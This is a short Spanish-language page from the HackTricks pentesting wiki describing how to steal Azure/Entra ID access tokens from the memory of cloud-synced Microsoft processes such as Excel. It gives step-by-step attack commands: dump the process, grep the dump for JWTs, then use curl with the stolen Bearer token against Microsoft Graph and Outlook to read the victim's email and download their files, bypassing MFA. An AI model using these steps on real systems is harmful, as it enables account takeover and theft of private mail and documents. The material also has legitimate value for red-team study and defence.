Az - Processes Memory Access Token

Support HackTricks

Información Básica

Como se explica en este video, algunos software de Microsoft sincronizados con la nube (Excel, Teams...) pueden almacenar tokens de acceso en texto claro en la memoria. Así que simplemente volcar la memoria del proceso y buscar tokens JWT puede otorgarte acceso a varios recursos de la víctima en la nube eludiendo MFA.

Pasos:

  1. Volcar los procesos de excel sincronizados con el usuario de EntraID con tu herramienta favorita.

  2. Ejecutar: string excel.dmp | grep 'eyJ0' y encontrar varios tokens en la salida.

  3. Encontrar los tokens que más te interesen y ejecutar herramientas sobre ellos:

# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq

# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq

# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq

## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq

## Finally, download a file from that drive:
┌──(magichk㉿black-pearl)-[~]
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'

Tenga en cuenta que este tipo de tokens de acceso también se pueden encontrar dentro de otros procesos.

Support HackTricks

Last updated